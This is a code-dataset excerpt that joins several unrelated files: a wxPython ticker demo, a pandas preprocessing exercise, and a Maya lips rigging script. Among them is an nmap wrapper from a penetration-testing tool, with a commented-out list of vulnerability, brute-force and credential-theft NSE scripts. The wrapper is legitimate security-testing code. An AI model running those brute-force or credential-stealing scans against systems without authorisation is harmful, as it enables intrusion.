self.Bind(wx.EVT_BUTTON, self.OnChangeTickDirection, dirb)
self.Bind(wx.EVT_BUTTON, self.OnChangeTickFont, fontb)
self.Bind(wx.EVT_TEXT, self.OnText, self.txt)
self.Bind(csel.EVT_COLOURSELECT, self.ChangeTickFGColor, fgb)
self.Bind(csel.EVT_COLOURSELECT, self.ChangeTickBGColor, bgb)
self.Bind(wx.EVT_SCROLL, self.ChangeFPS, fps)
self.Bind(wx.EVT_SCROLL, self.ChangePPF, ppf)
# Set defaults
self.SetTickDirection("rtl")
self.SetTickFont(self.ticker.GetFont())
self.ticker.SetText(self.txt.GetValue())
def SetTickFont(self, font):
"""Sets ticker font, updates label"""
self.ticker.SetFont(font)
self.fontl.SetLabel("Font: %s"%(self.ticker.GetFont().GetFaceName()))
self.Layout()
def OnChangeTickFont(self, evt):
fd = wx.FontData()
fd.EnableEffects(False)
fd.SetInitialFont(self.ticker.GetFont())
dlg = wx.FontDialog(wx.GetTopLevelParent(self), fd)
if dlg.ShowModal() == wx.ID_OK:
data = dlg.GetFontData()
self.SetTickFont(data.GetChosenFont())
def SetTickDirection(self, dir):
"""Sets tick direction, updates label"""
self.ticker.SetDirection(dir)
self.dirl.SetLabel("Direction: %s"%(self.ticker.GetDirection()))
def OnChangeTickDirection(self, dir):
if self.ticker.GetDirection() == "rtl":
self.SetTickDirection("ltr")
else:
self.SetTickDirection("rtl")
def OnText(self, evt):
"""Live update of the ticker text"""
self.ticker.SetText(self.txt.GetValue())
def ChangeTickFGColor(self, evt):
self.ticker.SetForegroundColour(evt.GetValue())
def ChangeTickBGColor(self, evt):
self.ticker.SetBackgroundColour(evt.GetValue())
def ChangeFPS(self, evt):
self.ticker.SetFPS(evt.GetPosition())
def ChangePPF(self, evt):
self.ticker.SetPPF(evt.GetPosition())
def ShutdownDemo(self):
self.ticker.Stop()
#----------------------------------------------------------------------
def runTest(frame, nb, log):
win = TestPanel(nb, log)
return win
#----------------------------------------------------------------------
overview = wx.lib.ticker.__doc__
if __name__ == '__main__':
import sys,os
import run
run.main(['', os.path.basename(sys.argv[0])] + sys.argv[1:])
| 34.925676
| 88
| 0.609015
|
4a0e9a61c773c9d67f7e32efbe6d8e7fecec1e0e
| 6,846
|
py
|
Python
|
src/nmap_scripts.py
|
secdec/ADAPT
|
f9bd149b321830588df47e06b8b8e1db07ea9d7a
|
[
"Apache-2.0"
] | 183
|
2018-09-18T20:44:31.000Z
|
2021-11-09T11:20:14.000Z
|
src/nmap_scripts.py
|
secdec/ADAPT
|
f9bd149b321830588df47e06b8b8e1db07ea9d7a
|
[
"Apache-2.0"
] | 11
|
2019-01-30T17:21:38.000Z
|
2021-01-17T23:33:47.000Z
|
src/nmap_scripts.py
|
secdec/ADAPT
|
f9bd149b321830588df47e06b8b8e1db07ea9d7a
|
[
"Apache-2.0"
] | 49
|
2018-09-21T21:18:43.000Z
|
2022-03-10T12:47:04.000Z
|
#
# Automated Dynamic Application Penetration Testing (ADAPT)
#
# Copyright (C) 2018 Applied Visions - http://securedecisions.com
#
# Written by Siege Technologies - http://www.siegetechnologies.com/
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import subprocess
import nmap
from pprint import pprint
def translate_url(url):
if(url.startswith("https://")):
url = url[8:]
elif(url.startswith("http://")):
url = url[7:]
url_parts = url.split("/")
if(url_parts[0].startswith("www.")):
url = url_parts[0][4:]
else:
url = url_parts[0]
return url
def find(data):
try:
for k,v in data.items():
if(k == "script"):
yield v
elif(isinstance(v, dict)):
for result in find(v):
yield result
elif(isinstance(v, list)):
for d in v:
for result in find(d):
yield result
except AttributeError:
yield data
class nmap_scripting():
def __init__(self, target, ports, scripts_to_run=None):
if(ports != None):
self.port_values = "-p"+",".join(ports.split())
else:
self.port_values = ""
self.target = translate_url(target)
self.nm = nmap.PortScanner()
self.__valid_scripts = []
if(scripts_to_run is None):
# for current project goals only one script is run
# The idea beaing that any future development or tests can
# just call an nmap script and use its information
self.__valid_scripts = [
#"ssl-cert", # getthe target's ssl certificate
#"ssl-ccs-injection", # determines if vulnerable to ccs injection (CVE-2014-0224)
#"ssl-cert-intaddr", # reports any private ipv4 addrs in the ssl certificate
#"ssl-dh-params", # Weak Diffe-Hellman handshake detection
#"ssl-enum-ciphers", # Tries multiple ssl/tsl ciphers and ranks available
#"ssl-heartbleed", # detects if app is vuln to heartbleed
#"ssl-known-key", # checks to see if certificate has any known bad keys
#"ssl-poodle", # checks if app is vuln to poodle
#"sslv2-drown", # checks if app supports sslv2 and is vuln to drown
#"sslv2", # checks if it supports older and outdated sslv2
#"http-vuln-cve2006-3392", # checks for directory information given by Webmin
#"http-vuln-cve2009-3960", # adobe XML external entity injection
#"http-vuln-cve2010-0738", # checks if Jboss target is vuln to jmx console auth bypass
#"http-vuln-cve2010-2861", # Directory draversal agains ColdFusion server
#"http-vuln-cve2011-3192", # Detects DoS vuln on Apache systems
#"http-vuln-cve2011-3368", # Checks Reverse Proxy Bypass on Apache
#"http-vuln-cve2012-1823", # Checks for PHP-CGI vulns
#"http-vuln-cve2013-0156", # Checks for Ruby object injections
#"http-vuln-cve2013-6786", # Redirection and XXS
#"http-vuln-cve2013-7091", # Zero data for local file retrieval
#"http-vuln-cve2014-2126", # Cisco ASA privilege escalation vuln
#"http-vuln-cve2014-2127", # Cisco ASA privilege escalation vuln
#"http-vuln-cve2014-2128", # Cisco ASA privilege escalation vuln
#"http-vuln-cve2014-2129", # Cisco ASA privilege escalation vuln
#"http-vuln-cve2014-3704", # SQL Injecection for Drupal
#"http-vuln-cve2014-8877", # Remote code injection for Wordpress
#"http-vuln-cve2015-1427", # Remote code execution via API exploitation
#"http-vuln-cve2015-1635", # Remote code execution on Microsoft systems
#"http-vuln-cve2017-1001000", # Privilege escalation on Wordpress
#"http-vuln-cve2017-5638", # Remote code execution for Apache Struts
#"http-vuln-cve2017-5689", # Pivilege escaltion for Intel Active management
#"http-vuln-cve2017-8917", # SQL injection for Joomla
#"http-vuln-misfortune-cookie", # RomPager Cookie vuln
#"http-vuln-wnr1000-creds", # Admin creds steal from WMR 1000 series
#"http-adobe-coldfusion-apsa1301", # Auth bypass via adobe coldfusion
#"http-affiliate-id", # grabs affiliate network information
#"http-apache-negotiation", # enables mod_negociation,allows potential spidering
#"http-apache-server-status", # attempts to retrieve apache server information
#"http-aspnet-debug", # determines if service enabled aspnet debug mode
#"http-auth", # get authentication scheme
#"http-auth-finder", # spiders for getting http based auth
#"http-awstatstotals-exec", # remote code execution in Awstats total
#"http-axis2-dir-traversal", # directory traversal in for apache axis2
#"http-backup-finder", # spidering attempt to discover duplicates/backup files
#"http-brute", # basic brute force http auth attack
#"http-chrono", # times page's responsivness
#"http-cisco-anyconnect", # connects as cisco AnyClient and retrieves basic information
#"http-coldfusion-subzero", # admin creds steal vial coldfusion vuln
#"http-comments-displayer", # displays comments from pages
#"http-config-backup", # searches for duplicates of system/server setup files
#"http-cors", # tests for cross-origin resource sharing
#"http-cross-domain-policy", # checks cross domain policy to expose overly permissive forms
#"http-csrf", # detects csrf forgeries
#"http-default-accounts", # tests for default accounts that may exist
#"http-dlink-backdoor", # checks for a firmware vuln on some dlink routers
#"http-dombased-xss", # uses the dom to leverage javascript
#"http-domino-enum-passwords", # tries to use the hashed Domino passwords
#"http-feed", # tries to get any rss information that may be present
#"http-form-brute", # brute forces http form based authentication
#"http-generator", # display's contents of generator metatab
#"http-headers", # tries to get a head request for "/"
#"http-joomla-brute", # brute force attack against joomla web CMS installations
#"http-malware-host", # signature search for known compromises
#"http-proxy-brute",
#"http-sql-injection",
"http-methods" # gets available methods from service (we only care about this for now)
]
else:
for i in scripts_to_run:
self.__valid_scripts.append(i)
def run(self):
results = self.nm.scan(self.target, arguments=self.port_values+" --script "+" --script ".join(self.__valid_scripts))
return list(find(results))
| 47.213793
| 118
| 0.693982
|
4a0e9b291df7fa79b69f078f0de0c1d9ef76e8cd
| 3,178
|
py
|
Python
|
Data-Preprocessing/code.py
|
Pannu22/ga-learner-dsmp-repo
|
b36777df3a91e48e5bf8e484f42ddbed98754728
|
[
"MIT"
] | null | null | null |
Data-Preprocessing/code.py
|
Pannu22/ga-learner-dsmp-repo
|
b36777df3a91e48e5bf8e484f42ddbed98754728
|
[
"MIT"
] | null | null | null |
Data-Preprocessing/code.py
|
Pannu22/ga-learner-dsmp-repo
|
b36777df3a91e48e5bf8e484f42ddbed98754728
|
[
"MIT"
] | null | null | null |
# --------------
#Importing header files
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
#Code starts here
data = pd.read_csv(path)
#Plotting Histogram
data['Rating'].hist()
data = data[data['Rating']<=5]
data['Rating'].hist()
#Code ends here
# --------------
# code starts here
# Finding null values
total_null = data.isnull().sum()
percent_null = (total_null/data.isnull().count())*100
missing_data = pd.concat([total_null,percent_null],axis=1,keys=['Total','Perceent'])
print(missing_data)
# Removing null values
data = data.dropna()
total_null_1 = data.isnull().sum()
percent_null_1 = (total_null/data.isnull().count())*100
missing_data_1 = pd.concat([total_null_1,percent_null_1],axis=1,keys=['Total','Perceent'])
print(missing_data_1)
# code ends here
# --------------
#Code starts here
# Rating of application in each category
sns.catplot(x="Category",y="Rating",data=data, kind="box", height = 10)
plt.xticks(rotation=90)
#Code ends here
# --------------
#Importing header files
from sklearn.preprocessing import MinMaxScaler, LabelEncoder
#Code starts here
#Converting type of Installs column
data['Installs'].value_counts()
data['Installs'] = data['Installs'].str.replace('+','')
data['Installs'] = data['Installs'].str.replace(',', "")
data['Installs'] = data['Installs'].astype(int)
#Label Encoding
le = LabelEncoder()
le.fit(data['Installs'])
data['Installs'] = le.transform(data['Installs'])
#Finding correlation
plt.figure(figsize = (14,10))
a = sns.regplot(x = "Installs", y = 'Rating', data = data)
a.axes.set_title('Rating vs Installs [RegPlot]', fontsize = 20)
a.set_xlabel("Installs", fontsize = 18)
a.set_ylabel("Rating", fontsize = 18)
a.tick_params(labelsize = 8)
#Code ends here
# --------------
#Code starts here
#Converting type of price column to float
data['Price'].value_counts()
data['Price'] = data['Price'].str.replace("$","")
data['Price'] = data['Price'].astype(float)
#Checking Correlation
plt.figure(figsize = (14,10))
a = sns.regplot(x = "Price", y = 'Rating', data = data)
a.axes.set_title('Rating vs Price [RegPlot]', fontsize = 20)
a.set_xlabel("Price", fontsize = 18)
a.set_ylabel("Rating", fontsize = 18)
a.tick_params(labelsize = 8)
#Code ends here
# --------------
#Code starts here
#Checking relation in between Genres and Rating
data['Genres'].unique()
a=[]
for i in data['Genres'] :
a.append(i.split(';')[0])
data['Genres'] = a
gr_mean = data.groupby('Genres', as_index = False)['Rating'].mean()
gr_mean.describe()
gr_mean = gr_mean.sort_values(by = 'Rating')
print(gr_mean.iloc[0], gr_mean.iloc[-1])
#Code ends here
# --------------
#Code starts here
#Comparing Rating and Last Updated
data['Last Updated']
data['Last Updated'] = pd.to_datetime(data['Last Updated'])
max_date = data['Last Updated'].max()
data['Last Updated Days'] = (max_date - data['Last Updated']).dt.days
plt.figure(figsize = (14,10))
a = sns.regplot(x = "Last Updated Days", y = 'Rating', data = data)
a.set_xlabel('Last Updated Days', fontsize = 15)
a.set_ylabel('Rating', fontsize = 15)
a.axes.set_title('Rating vs Last Updated [RegPlot]')
a.tick_params(labelsize = 13)
#Code ends here
| 23.716418
| 90
| 0.684078
|
4a0e9b79e9b5b4ca5f82826061f422ac6807068f
| 40,666
|
py
|
Python
|
scripts/mgear/rigbits/facial_rigger/lips_rigger.py
|
stormstudios/rigbits
|
37ce738952a3cd31ba8a18b8989f5ea491d03bf0
|
[
"MIT"
] | 1
|
2020-08-11T01:17:19.000Z
|
2020-08-11T01:17:19.000Z
|
scripts/mgear/rigbits/facial_rigger/lips_rigger.py
|
stormstudios/rigbits
|
37ce738952a3cd31ba8a18b8989f5ea491d03bf0
|
[
"MIT"
] | null | null | null |
scripts/mgear/rigbits/facial_rigger/lips_rigger.py
|
stormstudios/rigbits
|
37ce738952a3cd31ba8a18b8989f5ea491d03bf0
|
[
"MIT"
] | null | null | null |
"""Rigbits lips rigger tool"""
import json
from functools import partial
import mgear.core.pyqt as gqt
import pymel.core as pm
from maya.app.general.mayaMixin import MayaQWidgetDockableMixin
from mgear.vendor.Qt import QtCore, QtWidgets
from pymel.core import datatypes
from mgear import rigbits
from mgear.core import meshNavigation, curve, applyop, primitive, icon
from mgear.core import transform, attribute, skin, vector
from . import lib
##########################################################
# Lips rig constructor
##########################################################
def rig(edge_loop="",
up_vertex="",
low_vertex="",
name_prefix="",
thickness=0.3,
do_skin=True,
rigid_loops=5,
falloff_loops=8,
head_joint=None,
jaw_joint=None,
parent_node=None,
control_name="ctl"):
######
# Var
######
FRONT_OFFSET = .02
NB_ROPE = 15
##################
# Helper functions
##################
def setName(name, side="C", idx=None):
namesList = [name_prefix, side, name]
if idx is not None:
namesList[1] = side + str(idx)
name = "_".join(namesList)
return name
###############
# Checkers
##############
# Loop
if edge_loop:
try:
edge_loop = [pm.PyNode(e) for e in edge_loop.split(",")]
except pm.MayaNodeError:
pm.displayWarning(
"Some of the edges listed in edge loop can not be found")
return
else:
pm.displayWarning("Please set the edge loop first")
return
# Vertex
if up_vertex:
try:
up_vertex = pm.PyNode(up_vertex)
except pm.MayaNodeError:
pm.displayWarning("%s can not be found" % up_vertex)
return
else:
pm.displayWarning("Please set the upper lip central vertex")
return
if low_vertex:
try:
low_vertex = pm.PyNode(low_vertex)
except pm.MayaNodeError:
pm.displayWarning("%s can not be found" % low_vertex)
return
else:
pm.displayWarning("Please set the lower lip central vertex")
return
# skinnign data
if do_skin:
if not head_joint:
pm.displayWarning("Please set the Head Jnt or unCheck Compute "
"Topological Autoskin")
return
else:
try:
head_joint = pm.PyNode(head_joint)
except pm.MayaNodeError:
pm.displayWarning(
"Head Joint: %s can not be found" % head_joint
)
return
if not jaw_joint:
pm.displayWarning("Please set the Jaw Jnt or unCheck Compute "
"Topological Autoskin")
return
else:
try:
jaw_joint = pm.PyNode(jaw_joint)
except pm.MayaNodeError:
pm.displayWarning("Jaw Joint: %s can not be found" % jaw_joint)
return
# check if the rig already exist in the current scene
if pm.ls(setName("root")):
pm.displayWarning("The object %s already exist in the scene. Please "
"choose another name prefix" % setName("root"))
return
#####################
# Root creation
#####################
lips_root = primitive.addTransform(None, setName("root"))
lipsCrv_root = primitive.addTransform(lips_root, setName("crvs"))
lipsRope_root = primitive.addTransform(lips_root, setName("rope"))
#####################
# Geometry
#####################
geo = pm.listRelatives(edge_loop[0], parent=True)[0]
#####################
# Groups
#####################
try:
ctlSet = pm.PyNode("rig_controllers_grp")
except pm.MayaNodeError:
pm.sets(n="rig_controllers_grp", em=True)
ctlSet = pm.PyNode("rig_controllers_grp")
try:
defset = pm.PyNode("rig_deformers_grp")
except pm.MayaNodeError:
pm.sets(n="rig_deformers_grp", em=True)
defset = pm.PyNode("rig_deformers_grp")
#####################
# Curves creation
#####################
# get extreme position using the outer loop
extr_v = meshNavigation.getExtremeVertexFromLoop(edge_loop)
upPos = extr_v[0]
lowPos = extr_v[1]
inPos = extr_v[2]
outPos = extr_v[3]
edgeList = extr_v[4]
vertexList = extr_v[5]
upPos = up_vertex
lowPos = low_vertex
# upper crv
upLip_edgeRange = meshNavigation.edgeRangeInLoopFromMid(edgeList,
upPos,
inPos,
outPos)
upCrv = curve.createCuveFromEdges(upLip_edgeRange,
setName("upperLip"),
parent=lipsCrv_root)
# store the closest vertex by curv cv index. To be use fo the auto skining
upLip_closestVtxList = []
# offset upper lip Curve
cvs = upCrv.getCVs(space="world")
for i, cv in enumerate(cvs):
closestVtx = meshNavigation.getClosestVertexFromTransform(geo, cv)
upLip_closestVtxList.append(closestVtx)
if i == 0:
# we know the curv starts from right to left
offset = [cv[0] - thickness, cv[1], cv[2] - thickness]
elif i == len(cvs) - 1:
offset = [cv[0] + thickness, cv[1], cv[2] - thickness]
else:
offset = [cv[0], cv[1] + thickness, cv[2]]
upCrv.setCV(i, offset, space='world')
# lower crv
lowLip_edgeRange = meshNavigation.edgeRangeInLoopFromMid(edgeList,
lowPos,
inPos,
outPos)
lowCrv = curve.createCuveFromEdges(lowLip_edgeRange,
setName("lowerLip"),
parent=lipsCrv_root)
lowLip_closestVtxList = []
# offset lower lip Curve
cvs = lowCrv.getCVs(space="world")
for i, cv in enumerate(cvs):
closestVtx = meshNavigation.getClosestVertexFromTransform(geo, cv)
lowLip_closestVtxList.append(closestVtx)
if i == 0:
# we know the curv starts from right to left
offset = [cv[0] - thickness, cv[1], cv[2] - thickness]
elif i == len(cvs) - 1:
offset = [cv[0] + thickness, cv[1], cv[2] - thickness]
else:
# we populate the closest vertext list here to skipt the first
# and latest point
offset = [cv[0], cv[1] - thickness, cv[2]]
lowCrv.setCV(i, offset, space='world')
upCrv_ctl = curve.createCurveFromCurve(upCrv,
setName("upCtl_crv"),
nbPoints=7,
parent=lipsCrv_root)
lowCrv_ctl = curve.createCurveFromCurve(lowCrv,
setName("lowCtl_crv"),
nbPoints=7,
parent=lipsCrv_root)
upRope = curve.createCurveFromCurve(upCrv,
setName("upRope_crv"),
nbPoints=NB_ROPE,
parent=lipsCrv_root)
lowRope = curve.createCurveFromCurve(lowCrv,
setName("lowRope_crv"),
nbPoints=NB_ROPE,
parent=lipsCrv_root)
upCrv_upv = curve.createCurveFromCurve(upCrv,
setName("upCrv_upv"),
nbPoints=7,
parent=lipsCrv_root)
lowCrv_upv = curve.createCurveFromCurve(lowCrv,
setName("lowCrv_upv"),
nbPoints=7,
parent=lipsCrv_root)
upRope_upv = curve.createCurveFromCurve(upCrv,
setName("upRope_upv"),
nbPoints=NB_ROPE,
parent=lipsCrv_root)
lowRope_upv = curve.createCurveFromCurve(lowCrv,
setName("lowRope_upv"),
nbPoints=NB_ROPE,
parent=lipsCrv_root)
# offset upv curves
for crv in [upCrv_upv, lowCrv_upv, upRope_upv, lowRope_upv]:
cvs = crv.getCVs(space="world")
for i, cv in enumerate(cvs):
# we populate the closest vertext list here to skipt the first
# and latest point
offset = [cv[0], cv[1], cv[2] + FRONT_OFFSET]
crv.setCV(i, offset, space='world')
rigCrvs = [upCrv,
lowCrv,
upCrv_ctl,
lowCrv_ctl,
upRope,
lowRope,
upCrv_upv,
lowCrv_upv,
upRope_upv,
lowRope_upv]
for crv in rigCrvs:
crv.attr("visibility").set(False)
##################
# Joints
##################
lvlType = "transform"
# upper joints
upperJoints = []
cvs = upCrv.getCVs(space="world")
pm.progressWindow(title='Creating Upper Joints', progress=0, max=len(cvs))
for i, cv in enumerate(cvs):
pm.progressWindow(e=True,
step=1,
status='\nCreating Joint for %s' % cv)
oTransUpV = pm.PyNode(pm.createNode(
lvlType,
n=setName("upLipRopeUpv", idx=str(i).zfill(3)),
p=lipsRope_root,
ss=True))
oTrans = pm.PyNode(
pm.createNode(lvlType,
n=setName("upLipRope", idx=str(i).zfill(3)),
p=lipsRope_root, ss=True))
oParam, oLength = curve.getCurveParamAtPosition(upRope, cv)
uLength = curve.findLenghtFromParam(upRope, oParam)
u = uLength / oLength
applyop.pathCns(
oTransUpV, upRope_upv, cnsType=False, u=u, tangent=False)
cns = applyop.pathCns(
oTrans, upRope, cnsType=False, u=u, tangent=False)
cns.setAttr("worldUpType", 1)
cns.setAttr("frontAxis", 0)
cns.setAttr("upAxis", 1)
pm.connectAttr(oTransUpV.attr("worldMatrix[0]"),
cns.attr("worldUpMatrix"))
# getting joint parent
if head_joint and isinstance(head_joint, (str, unicode)):
try:
j_parent = pm.PyNode(head_joint)
except pm.MayaNodeError:
j_parent = False
elif head_joint and isinstance(head_joint, pm.PyNode):
j_parent = head_joint
else:
j_parent = False
jnt = rigbits.addJnt(oTrans, noReplace=True, parent=j_parent)
upperJoints.append(jnt)
pm.sets(defset, add=jnt)
pm.progressWindow(e=True, endProgress=True)
# lower joints
lowerJoints = []
cvs = lowCrv.getCVs(space="world")
pm.progressWindow(title='Creating Lower Joints', progress=0, max=len(cvs))
for i, cv in enumerate(cvs):
pm.progressWindow(e=True,
step=1,
status='\nCreating Joint for %s' % cv)
oTransUpV = pm.PyNode(pm.createNode(
lvlType,
n=setName("lowLipRopeUpv", idx=str(i).zfill(3)),
p=lipsRope_root,
ss=True))
oTrans = pm.PyNode(pm.createNode(
lvlType,
n=setName("lowLipRope", idx=str(i).zfill(3)),
p=lipsRope_root,
ss=True))
oParam, oLength = curve.getCurveParamAtPosition(lowRope, cv)
uLength = curve.findLenghtFromParam(lowRope, oParam)
u = uLength / oLength
applyop.pathCns(oTransUpV,
lowRope_upv,
cnsType=False,
u=u,
tangent=False)
cns = applyop.pathCns(oTrans,
lowRope,
cnsType=False,
u=u,
tangent=False)
cns.setAttr("worldUpType", 1)
cns.setAttr("frontAxis", 0)
cns.setAttr("upAxis", 1)
pm.connectAttr(oTransUpV.attr("worldMatrix[0]"),
cns.attr("worldUpMatrix"))
# getting joint parent
if jaw_joint and isinstance(jaw_joint, (str, unicode)):
try:
j_parent = pm.PyNode(jaw_joint)
except pm.MayaNodeError:
pass
elif jaw_joint and isinstance(jaw_joint, pm.PyNode):
j_parent = jaw_joint
else:
j_parent = False
jnt = rigbits.addJnt(oTrans, noReplace=True, parent=j_parent)
lowerJoints.append(jnt)
pm.sets(defset, add=jnt)
pm.progressWindow(e=True, endProgress=True)
##################
# Controls
##################
# Controls lists
upControls = []
upVec = []
upNpo = []
lowControls = []
lowVec = []
lowNpo = []
# controls options
axis_list = ["sx", "sy", "sz", "ro"]
upCtlOptions = [["corner", "R", "square", 4, .05, axis_list],
["upOuter", "R", "circle", 14, .03, []],
["upInner", "R", "circle", 14, .03, []],
["upper", "C", "square", 4, .05, axis_list],
["upInner", "L", "circle", 14, .03, []],
["upOuter", "L", "circle", 14, .03, []],
["corner", "L", "square", 4, .05, axis_list]]
lowCtlOptions = [["lowOuter", "R", "circle", 14, .03, []],
["lowInner", "R", "circle", 14, .03, []],
["lower", "C", "square", 4, .05, axis_list],
["lowInner", "L", "circle", 14, .03, []],
["lowOuter", "L", "circle", 14, .03, []]]
params = ["tx", "ty", "tz", "rx", "ry", "rz"]
# upper controls
cvs = upCrv_ctl.getCVs(space="world")
pm.progressWindow(title='Upper controls', progress=0, max=len(cvs))
v0 = transform.getTransformFromPos(cvs[0])
v1 = transform.getTransformFromPos(cvs[-1])
distSize = vector.getDistance(v0, v1) * 3
for i, cv in enumerate(cvs):
pm.progressWindow(e=True,
step=1,
status='\nCreating control for%s' % cv)
t = transform.getTransformFromPos(cv)
# Get nearest joint for orientation of controls
joints = upperJoints + lowerJoints
nearest_joint = None
nearest_distance = None
for joint in joints:
distance = vector.getDistance(
transform.getTranslation(joint),
cv
)
if distance < nearest_distance or nearest_distance is None:
nearest_distance = distance
nearest_joint = joint
if nearest_joint:
t = transform.setMatrixPosition(
transform.getTransform(nearest_joint), cv
)
temp = primitive.addTransform(
lips_root, setName("temp"), t
)
temp.rx.set(0)
t = transform.getTransform(temp)
pm.delete(temp)
oName = upCtlOptions[i][0]
oSide = upCtlOptions[i][1]
o_icon = upCtlOptions[i][2]
color = upCtlOptions[i][3]
wd = upCtlOptions[i][4]
oPar = upCtlOptions[i][5]
npo = primitive.addTransform(lips_root,
setName("%s_npo" % oName, oSide),
t)
upNpo.append(npo)
ctl = icon.create(npo,
setName("%s_%s" % (oName, control_name), oSide),
t,
icon=o_icon,
w=wd * distSize,
d=wd * distSize,
ro=datatypes.Vector(1.57079633, 0, 0),
po=datatypes.Vector(0, 0, .07 * distSize),
color=color)
upControls.append(ctl)
name_split = control_name.split("_")
if len(name_split) == 2 and name_split[-1] == "ghost":
pass
else:
pm.sets(ctlSet, add=ctl)
attribute.addAttribute(ctl, "isCtl", "bool", keyable=False)
attribute.setKeyableAttributes(ctl, params + oPar)
upv = primitive.addTransform(ctl, setName("%s_upv" % oName, oSide), t)
upv.attr("tz").set(FRONT_OFFSET)
upVec.append(upv)
if oSide == "R":
npo.attr("sx").set(-1)
pm.progressWindow(e=True, endProgress=True)
# lower controls
cvs = lowCrv_ctl.getCVs(space="world")
pm.progressWindow(title='Lower controls', progress=0, max=len(cvs))
for i, cv in enumerate(cvs[1:-1]):
pm.progressWindow(e=True,
step=1,
status='\nCreating control for%s' % cv)
t = transform.getTransformFromPos(cv)
# Get nearest joint for orientation of controls
joints = upperJoints + lowerJoints
nearest_joint = None
nearest_distance = None
for joint in joints:
distance = vector.getDistance(
transform.getTranslation(joint),
cv
)
if distance < nearest_distance or nearest_distance is None:
nearest_distance = distance
nearest_joint = joint
if nearest_joint:
t = transform.setMatrixPosition(
transform.getTransform(nearest_joint), cv
)
temp = primitive.addTransform(
lips_root, setName("temp"), t
)
temp.rx.set(0)
t = transform.getTransform(temp)
pm.delete(temp)
oName = lowCtlOptions[i][0]
oSide = lowCtlOptions[i][1]
o_icon = lowCtlOptions[i][2]
color = lowCtlOptions[i][3]
wd = lowCtlOptions[i][4]
oPar = lowCtlOptions[i][5]
npo = primitive.addTransform(lips_root,
setName("%s_npo" % oName, oSide),
t)
lowNpo.append(npo)
ctl = icon.create(npo,
setName("%s_%s" % (oName, control_name), oSide),
t,
icon=o_icon,
w=wd * distSize,
d=wd * distSize,
ro=datatypes.Vector(1.57079633, 0, 0),
po=datatypes.Vector(0, 0, .07 * distSize),
color=color)
lowControls.append(ctl)
name_split = control_name.split("_")
if len(name_split) == 2 and control_name.split("_")[-1] == "ghost":
pass
else:
pm.sets(ctlSet, add=ctl)
attribute.addAttribute(ctl, "isCtl", "bool", keyable=False)
attribute.setKeyableAttributes(ctl, params + oPar)
upv = primitive.addTransform(ctl, setName("%s_upv" % oName, oSide), t)
upv.attr("tz").set(FRONT_OFFSET)
lowVec.append(upv)
if oSide == "R":
npo.attr("sx").set(-1)
pm.progressWindow(e=True, endProgress=True)
# reparentig controls
pm.parent(upNpo[1], lowNpo[0], upControls[0])
pm.parent(upNpo[2], upNpo[4], upControls[3])
pm.parent(upNpo[-2], lowNpo[-1], upControls[-1])
pm.parent(lowNpo[1], lowNpo[3], lowControls[2])
# Connecting control crvs with controls
applyop.gear_curvecns_op(upCrv_ctl, upControls)
applyop.gear_curvecns_op(lowCrv_ctl,
[upControls[0]] + lowControls + [upControls[-1]])
applyop.gear_curvecns_op(upCrv_upv, upVec)
applyop.gear_curvecns_op(lowCrv_upv, [upVec[0]] + lowVec + [upVec[-1]])
# adding wires
pm.wire(upCrv, w=upCrv_ctl, dropoffDistance=[0, 1000])
pm.wire(lowCrv, w=lowCrv_ctl, dropoffDistance=[0, 1000])
pm.wire(upRope, w=upCrv_ctl, dropoffDistance=[0, 1000])
pm.wire(lowRope, w=lowCrv_ctl, dropoffDistance=[0, 1000])
pm.wire(upRope_upv, w=upCrv_upv, dropoffDistance=[0, 1000])
pm.wire(lowRope_upv, w=lowCrv_upv, dropoffDistance=[0, 1000])
# setting constrains
# up
cns_node = pm.parentConstraint(upControls[0],
upControls[3],
upControls[1].getParent(),
mo=True,
skipRotate=["x", "y", "z"])
cns_node.attr(upControls[0].name() + "W0").set(.75)
cns_node.attr(upControls[3].name() + "W1").set(.25)
cns_node = pm.parentConstraint(upControls[0],
upControls[3],
upControls[2].getParent(),
mo=True,
skipRotate=["x", "y", "z"])
cns_node.attr(upControls[0].name() + "W0").set(.25)
cns_node.attr(upControls[3].name() + "W1").set(.75)
cns_node = pm.parentConstraint(upControls[3],
upControls[6],
upControls[4].getParent(),
mo=True,
skipRotate=["x", "y", "z"])
cns_node.attr(upControls[3].name() + "W0").set(.75)
cns_node.attr(upControls[6].name() + "W1").set(.25)
cns_node = pm.parentConstraint(upControls[3],
upControls[6],
upControls[5].getParent(),
mo=True,
skipRotate=["x", "y", "z"])
cns_node.attr(upControls[3].name() + "W0").set(.25)
cns_node.attr(upControls[6].name() + "W1").set(.75)
# low
cns_node = pm.parentConstraint(upControls[0],
lowControls[2],
lowControls[0].getParent(),
mo=True,
skipRotate=["x", "y", "z"])
cns_node.attr(upControls[0].name() + "W0").set(.75)
cns_node.attr(lowControls[2].name() + "W1").set(.25)
cns_node = pm.parentConstraint(upControls[0],
lowControls[2],
lowControls[1].getParent(),
mo=True,
skipRotate=["x", "y", "z"])
cns_node.attr(upControls[0].name() + "W0").set(.25)
cns_node.attr(lowControls[2].name() + "W1").set(.75)
cns_node = pm.parentConstraint(lowControls[2],
upControls[6],
lowControls[3].getParent(),
mo=True,
skipRotate=["x", "y", "z"])
cns_node.attr(lowControls[2].name() + "W0").set(.75)
cns_node.attr(upControls[6].name() + "W1").set(.25)
cns_node = pm.parentConstraint(lowControls[2],
upControls[6],
lowControls[4].getParent(),
mo=True,
skipRotate=["x", "y", "z"])
cns_node.attr(lowControls[2].name() + "W0").set(.25)
cns_node.attr(upControls[6].name() + "W1").set(.75)
###########################################
# Connecting rig
###########################################
if parent_node:
try:
if isinstance(parent_node, basestring):
parent_node = pm.PyNode(parent_node)
parent_node.addChild(lips_root)
except pm.MayaNodeError:
pm.displayWarning("The Lips rig can not be parent to: %s. Maybe "
"this object doesn't exist." % parent_node)
if head_joint and jaw_joint:
try:
if isinstance(head_joint, basestring):
head_joint = pm.PyNode(head_joint)
except pm.MayaNodeError:
pm.displayWarning("Head Joint or Upper Lip Joint %s. Can not be "
"fount in the scene" % head_joint)
return
try:
if isinstance(jaw_joint, basestring):
jaw_joint = pm.PyNode(jaw_joint)
except pm.MayaNodeError:
pm.displayWarning("Jaw Joint or Lower Lip Joint %s. Can not be "
